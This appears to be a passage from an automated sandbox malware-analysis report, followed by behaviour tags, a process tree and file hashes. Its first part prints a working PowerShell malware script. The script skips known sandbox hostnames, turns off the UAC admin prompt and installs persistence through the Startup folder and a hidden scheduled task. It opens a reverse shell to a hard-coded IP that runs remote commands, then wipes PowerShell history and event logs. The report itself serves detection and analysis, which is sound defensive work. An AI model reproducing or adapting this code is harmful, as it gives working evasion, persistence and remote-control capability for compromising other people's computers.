'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'I'+'L'+'6'+'I'+'Y'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'E'+'C'+'W'+'Z'+'X'+'Y'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'7'+'B'+'G'+'E'+'N'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'S'+'H'+'H'+'Z'+'L'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'4'+'C'+'W'+'F'+'L'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'E'+'L'+'A'+'T'+'O'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'L'+'B'+'A'+'Z'+'X'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'N'+'Q'+'Z'+'M'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'P'+'P'+'K'+'5'+'V'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'A'+'S'+'A'+'N'+'L'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'Q'+'L'+'U'+'W'+'F'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'S'+'S'+'0'+'D'+'J'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'A'+'P'+'K'+'N'+'1'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'F'+'C'+'A'+'Q'+'V'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'O'+'N'+'5'+'Z'+'S'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'Q'+'P'+'I'+'F'+'W'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'A'+'L'+'V'+'I'+'N'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'O'+'K'+'O'+'V'+'S'+'K') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'A'+'K'+'F'+'F'+'M'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'K'+'P'+'0'+'I'+'4'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'M'+'1'+'Z'+'P'+'L'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'T'+'U'+'7'+'V'+'U'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'U'+'A'+'Y'+'8'+'G'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'C'+'A'+'3'+'Q'+'W'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'H'+'X'+'D'+'K'+'W'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'1'+'L'+'F'+'P'+'H'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'P'+'E'+'R'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'1'+'L'+'2'+'6'+'J'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'I'+'R'+'E'+'N'+'D'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'K'+'N'+'F'+'F'+'B'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'R'+'S'+'Q'+'L'+'A'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'W'+'J'+'U'+'7'+'M'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Z'+'5'+'Z'+'S'+'Y'+'I') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'8'+'J'+'L'+'V'+'9'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'G'+'3'+'M'+'Y'+'J'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'I'+'8'+'C'+'L'+'E'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'O'+'Y'+'7'+'M'+'H'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'8'+'A'+'S'+'U'+'I'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'W'+'9'+'U'+'O'+'1'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'J'+'F'+'9'+'K'+'A'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'M'+'Y'+'E'+'H'+'D'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'N'+'C'+'A'+'E'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'O'+'J'+'J'+'8'+'K'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'V'+'9'+'G'+'V'+'Y'+'L') { exit } if ($HNAME2023 -eq 'D'+'O'+'M'+'I'+'C'+'-'+'D'+'E'+'S'+'K'+'T'+'O'+'P') { exit } if ($HNAME2023 -eq 'E'+'A'+'8'+'C'+'2'+'E'+'2'+'A'+'-'+'D'+'0'+'1'+'7'+'-'+'4') { exit } if ($HNAME2023 -eq 'E'+'S'+'P'+'N'+'H'+'O'+'O'+'L') { exit } if ($HNAME2023 -eq 'G'+'A'+'N'+'G'+'I'+'S'+'T'+'A'+'N') { exit } if ($HNAME2023 -eq 'G'+'B'+'Q'+'H'+'U'+'R'+'C'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'A'+'F'+'P'+'C') { exit } if ($HNAME2023 -eq 'G'+'R'+'X'+'N'+'N'+'I'+'I'+'E') { exit } if ($HNAME2023 -eq 'g'+'Y'+'y'+'Z'+'c'+'9'+'H'+'Z'+'C'+'Y'+'h'+'R'+'L'+'N'+'g') { exit } if ($HNAME2023 -eq 'J'+'B'+'Y'+'Q'+'T'+'Q'+'B'+'O') { exit } if ($HNAME2023 -eq 'J'+'E'+'R'+'R'+'Y'+'-'+'T'+'R'+'U'+'J'+'I'+'L'+'L'+'O') { exit } if ($HNAME2023 -eq 'J'+'O'+'H'+'N'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'J'+'U'+'D'+'E'+'S'+'-'+'D'+'O'+'J'+'O') { exit } if ($HNAME2023 -eq 'J'+'U'+'L'+'I'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'A'+'N'+'T'+'E'+'C'+'H'+'-'+'L'+'L'+'C') { exit } if ($HNAME2023 -eq 'L'+'I'+'S'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'O'+'U'+'I'+'S'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'L'+'U'+'C'+'A'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'M'+'I'+'K'+'E'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'N'+'E'+'T'+'T'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'E'+'L'+'E'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'O'+'R'+'X'+'G'+'K'+'K'+'Z'+'C') { exit } if ($HNAME2023 -eq 'P'+'a'+'u'+'l'+' '+'J'+'o'+'n'+'e'+'s') { exit } if ($HNAME2023 -eq 'P'+'C'+'-'+'D'+'A'+'N'+'I'+'E'+'L'+'E') { exit } if ($HNAME2023 -eq 'P'+'R'+'O'+'P'+'E'+'R'+'T'+'Y'+'-'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'Q'+'9'+'I'+'A'+'T'+'R'+'K'+'P'+'R'+'H') { exit } if ($HNAME2023 -eq 'Q'+'a'+'r'+'Z'+'h'+'r'+'d'+'B'+'p'+'j') { exit } if ($HNAME2023 -eq 'R'+'A'+'L'+'P'+'H'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'S'+'E'+'R'+'V'+'E'+'R'+'1') { exit } if ($HNAME2023 -eq 'S'+'t'+'e'+'v'+'e') { exit } if ($HNAME2023 -eq 'S'+'Y'+'K'+'G'+'U'+'I'+'D'+'E'+'-'+'W'+'S'+'1'+'7') { exit } if ($HNAME2023 -eq 'T'+'0'+'0'+'9'+'1'+'7') { exit } if ($HNAME2023 -eq 't'+'e'+'s'+'t'+'4'+'2') { exit } if ($HNAME2023 -eq 'T'+'I'+'Q'+'I'+'Y'+'L'+'A'+'9'+'T'+'W'+'5'+'M') { exit } if ($HNAME2023 -eq 'T'+'M'+'K'+'N'+'G'+'O'+'M'+'U') { exit } if ($HNAME2023 -eq 'T'+'V'+'M'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'V'+'O'+'N'+'R'+'A'+'H'+'E'+'L') { exit } if ($HNAME2023 -eq 'W'+'I'+'L'+'E'+'Y'+'P'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'5'+'E'+'0'+'7'+'C'+'O'+'S'+'9'+'A'+'L'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'D'+'O'+'W'+'S'+'-'+'E'+'E'+'L'+'5'+'3'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'1'+'B'+'H'+'R'+'V'+'P'+'Q'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'2'+'2'+'U'+'R'+'J'+'I'+'B'+'V') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'3'+'F'+'F'+'2'+'I'+'9'+'S'+'N') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'5'+'J'+'7'+'5'+'D'+'T'+'H'+'H') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'6'+'T'+'U'+'I'+'H'+'N'+'7'+'R') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'8'+'M'+'A'+'E'+'I'+'8'+'E'+'4') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'9'+'I'+'O'+'7'+'5'+'S'+'V'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'A'+'M'+'7'+'6'+'H'+'P'+'K'+'2') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'0'+'3'+'L'+'9'+'C'+'E'+'O') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'M'+'S'+'M'+'D'+'8'+'M'+'E') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'B'+'U'+'A'+'O'+'K'+'G'+'G'+'1') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'K'+'7'+'V'+'I'+'K'+'4'+'F'+'C') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'Q'+'N'+'G'+'K'+'G'+'N'+'5'+'9') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'R'+'S'+'T'+'0'+'E'+'8'+'V'+'U') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'U'+'9'+'5'+'1'+'9'+'1'+'I'+'G') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'Z'+'D'+'S'+'-'+'V'+'Q'+'H'+'8'+'6'+'L'+'5'+'D') { exit } if ($HNAME2023 -eq 'W'+'O'+'R'+'K') { exit } if ($HNAME2023 -eq 'X'+'C'+'6'+'4'+'Z'+'B') { exit } if ($HNAME2023 -eq 'X'+'G'+'N'+'S'+'V'+'O'+'D'+'U') { exit } if ($HNAME2023 -eq 'Z'+'E'+'L'+'J'+'A'+'V'+'A') { exit } if ($HNAME2023 -eq '3'+'C'+'E'+'C'+'E'+'F'+'C'+'8'+'3'+'8'+'0'+'6') { exit } if ($HNAME2023 -eq 'C'+'8'+'1'+'F'+'6'+'6'+'C'+'8'+'3'+'8'+'0'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'S'+'L'+'V'+'D'+'7'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'U'+'P'+'F'+'K'+'S'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'P'+'4'+'F'+'I'+'B'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'U'+'J'+'B'+'D'+'2'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'L'+'T'+'M'+'C'+'K'+'L'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'L'+'T'+'W'+'Y'+'Y'+'U') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'A'+'2'+'B'+'Y'+'3'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'B'+'D'+'J'+'J'+'0'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'X'+'P'+'5'+'Y'+'F'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'A'+'U'+'8'+'G'+'J'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'C'+'R'+'B'+'3'+'F'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Y'+'R'+'N'+'O'+'7'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'K'+'Q'+'N'+'D'+'S'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'C'+'N'+'D'+'J'+'W'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'S'+'N'+'L'+'F'+'Z'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'W'+'F'+'R'+'V'+'K'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'L'+'N'+'2'+'V'+'U'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'2'+'Y'+'P'+'F'+'I'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'P'+'A'+'0'+'F'+'N'+'V'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'9'+'O'+'A'+'R'+'K'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'5'+'X'+'G'+'G'+'X'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'H'+'U'+'H'+'O'+'T'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'4'+'A'+'C'+'U'+'C'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'N'+'D'+'M'+'I'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'C'+'N'+'6'+'M'+'I'+'O') { exit } if ($HNAME2023 -eq 'F'+'E'+'R'+'R'+'E'+'I'+'R'+'A'+'-'+'W'+'1'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'M'+'J'+'C'+'6'+'5'+'0'+'0') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'S'+'7'+'P'+'P'+'R'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'W'+'Q'+'5'+'F'+'U'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'U'+'H'+'H'+'S'+'Y'+'4'+'R') { exit } if ($HNAME2023 -eq 'A'+'R'+'T'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'0') { exit } if ($HNAME2023 -eq '2'+'2'+'H'+'2'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'1'+'3') { exit } if ($HNAME2023 -eq 'R'+'T'+'T'+'C'+'-'+'S'+'a'+'n'+'d'+'y'+'-'+'0'+'1') { exit } if ($HNAME2023 -eq 'A'+'N'+'N'+'A'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'H'+'E'+'A'+'F'+'X'+'H'+'S'+'8'+'9'+'7'+'3'+'9'+'8'+'0'+'7') { exit } if ($HNAME2023 -eq 'W'+'I'+'N'+'-'+'F'+'A'+'Q'+'N'+'W'+'5'+'1'+'H'+'S'+'Q'+'0') { exit } Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 $curDir = Get-Location Copy-Item -Path \"$curDir\Confidential.exe\" -Recurse -Destination \"$($env:APPDATA)\Microsoft\Windows\Start Menu\Programs\Startup\update.exe\" -Force $Action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"-ExecutionPolicy Bypass -WindowStyle Hidden -Command Start-Process -FilePath '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe'\";$Trigger = New-ScheduledTaskTrigger -AtLogon;Register-ScheduledTask -TaskName \"service_upd\" -Trigger $Trigger -Action $Action -RunLevel Highest -Force while ($true) { try { $tcpClient = [System.Net.Sockets.TcpClient]::new() $tcpClient.Connect(\"141.98.6.232\", 4434) $stream = $tcpClient.GetStream() $reader = [System.IO.StreamReader]::new($stream) $writer = [System.IO.StreamWriter]::new($stream) $writer.AutoFlush = $true while ($true) { $command = $reader.ReadLine() if ($command -eq \"exit\") { exit } $output = @(Invoke-Expression $command) $outputCount = $output.Length $writer.WriteLine($outputCount) foreach ($o in $output) { $writer.WriteLine($o) } } $tcpClient.Close() } catch { Start-Sleep -Seconds 30 } } } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse Clear-EventLog -LogName \"Windows PowerShell\" } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } "3⤵
- UAC bypass
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"4⤵PID:4680
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1160
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53bfc414667e1ebc31e9259fa1db290fa
SHA19bff989429779efef334e5524a362e7b6ff266cb
SHA256b58f994c644f7b4a831e889630bfd7ca0860aeb1e0920dc0f5d4928585a9dbab
SHA512e6cb000e8f900132f7dc661f943b8e91e945d171157ff3289b91e9d79f70230e363ed65b7ec97f451b376cf4706a14de9a86193e72dcea8fe3aa8c86c6117d13
-
Filesize
152B
MD5c032c944f0c68db2f9bc2541ba822212
SHA1a829f6cf1e7f3f796eeb68ef3525d7f3d177a38a
SHA2561b4b0d7b255a79089375c9c200df8f48c8536ec99752f877e9090af9dd8e4127
SHA512cc22cf70c068f1b5c518a8d3302cbb5a79a66929488cd34939f7743aaa999cba091f182701cdda5872b6b93cf89d396b809b0b7f6f2d5f6e7ad1b5102623cf7e
-
Filesize
152B
MD5e0db402062b0af9ebbf6385372ca8d0b
SHA1af778006b22dbafed0ffc708c2a08c75866173ef
SHA2563496117f92c5f4f895aa007bdb10496eaf20edbc77be2abeef611fbc082c1827
SHA512a38b4bcac17c451d7a34a90f3612436adf0d896e5c074de11af59fb1a8abe1bb4536b3efd3e00565fbfba296a59fa46415b7d0468ba6f00110ca605c9760eae0
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
2KB
MD5361c26026c46534216aecd72a0250d66
SHA140e70464e7e268d7b1608cbc37bf97bf48b348c4
SHA256748b84ecaae531efecd2cbebeb6a97b76c11414ca848500113d15bc16fb1db91
SHA512e7cbafa955e4f58937ce0102e07cbbe967344dbca253930b525d72b5b88998976a66cabada7f5949119f7409c706c311163528909ba6626a727ba7bd9682e8bf
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
4KB
MD54659a44e6e3460ddecb14b4ea49fdf4e
SHA172af93ca28ebcc64458670ead6bd356dfe32b5d5
SHA256f52b1961a872c77a9ebccd9944c13864ae401645c95b2a701321f17b55d5fdbf
SHA5120375eb3aa93a6bacd7c6019c96f6c9038267616e3525e8aae9206c7f8c3c14840749f6631dfe1a58a70aa566537c3325bb98a88046fcea87ac38b269cd8f7d30
-
Filesize
5KB
MD59d03450d6dfc2b080e1ba247db2757a6
SHA12535a0f989a7e1289b66cdcb519a91ddb70cdad1
SHA2563cf8ed0af1c815f9e288157a57e8e5da1018dae40b88b8b059a4cd4abae43fe9
SHA51269702564c37f9ebb42d45e253465f794b774862677cfb264a0c034db9c9b33fe670f1f29c2ded0fdf4ea5cded328e1c06bb29c779601169aa383962cfd6f77cb
-
Filesize
5KB
MD5383690a75ce6c230c2e98b149a4eb5ed
SHA1ec52902af041c4018baf7074108903d16c43cdc8
SHA25624334f856c8219b687a462bf7e15c9d74215f5ae92eadc84f656f1ac184c9290
SHA512ea7c9184f0f70ecc7f21c2d313c5c6403a259af7148f2e469ba3e1afeb1b4b72d0b351c458d1ab46f5456779e2c36d773ad16609aac1866c4dadfc5719fdd019
-
Filesize
5KB
MD5f8082f9ff71b3a421afff31a2c656b9e
SHA12aa221e75b1f1ad6b7aa0863bede239ebae3ba66
SHA2567865232285c3e3065d2ced9993d1d653d7a370ff2f6e21086bab00e92f6974fb
SHA512a382fb96d57d986246226eb5087faf0f5b80077ee7abad625250123f19367399bb7bc682ecfe160d87eb9da2e5ccd108c299a02cad3e746b2c82edef7c0b8680
-
Filesize
24KB
MD508ec5969be8e3995de1976a77b350ccc
SHA1938c9a5df356d118c9e435ced818d217d55f70ee
SHA2563eba1c53e369cbeee335d13b78116c4a74b4d4ca79531e89f6250324ca253b0b
SHA51234c17b46774153ee3e5d0598d5300f2b336afb1d5ebd472b8da831f6dde0efd2137bd0a95a034c98e11953bbc9b06f076a8e25239f516bd5a46b06be37a90f53
-
Filesize
24KB
MD5d5f6e43b9bb30966d0bc507edaa766af
SHA1f55430cdf8aac488b7e726277ff47551de8f6b3c
SHA25626c3c700f69edb0a1ef22ad9cabc4c126967093a008638d4b9e91aea558f7053
SHA512580548318c413a964558422b0cbd1b05cc46f9cba53b59e2818f768f8ee9f8e3838981d686b2e82f24b3b62145cb7f1240c7602adddfabef6356730413310713
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
10KB
MD5c512d40b147b7d237684115c3e6673b9
SHA17e10b11f88c36aef2e945865201c88de8e49f24e
SHA25664cc5d00d3711f2dcef0399c6e119d89928f5872f86eef097772106b54251391
SHA512222cee8ddb01cebc8b34df0a6ae745e18aad9ac7731961fe458ea5c38161a09fcaf969e394abb58ef52030f3d8e98cc8bc76b1437551895f001fdc21f29d98af
-
Filesize
13KB
MD5e618fb008dfc1fdf4961dee458756953
SHA19c0c8f71f83ed71dac541a7c204c102392fb7071
SHA256428729f051d60de30c273ca50529256a7cccb5feac5e2a1c114d6374504083b3
SHA51238883b7af8a842e0e68c553e908f28b6fadaf64f9815f4344bcde98feed1a87613100323debcc4ac68e8a1105199e6dd779395d201786e48820c2c05b350138c
-
Filesize
1KB
MD5e4c8e06feef9244798d4ad71ab158f08
SHA14e90c4f42c3be29046dbf8a49c0ea4a8380568e0
SHA2560268b5ba878364d9a3dc79a04281ed285ee1e39f0b8f3157b621321c8e059a5c
SHA512c81ba44473bd513ee416f977ce1aaaddbac6a994f45d5e5ca0c72f6eb9cf3eebe27cefc841e5c7082a83e1b6eac970f0b079167262c6725492dedd824fd1bdba
-
Filesize
33KB
MD5ec4044176d8ddbac57abd3f8bc03f729
SHA13df913445f4916b172fdc44f52cecc8547fe9a13
SHA256640c43e01ac851132548ff0227bf522006c947c84332d13c88b114f23f373643
SHA5122d75702e18d2cc91220b0605a73fdf7a43878ceb25b1258e634da23f7847c0f110d236dee804be76ff795d30df0b6ff0ac11a3c6ccf32c9c9b2715e90bbdaf7a
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
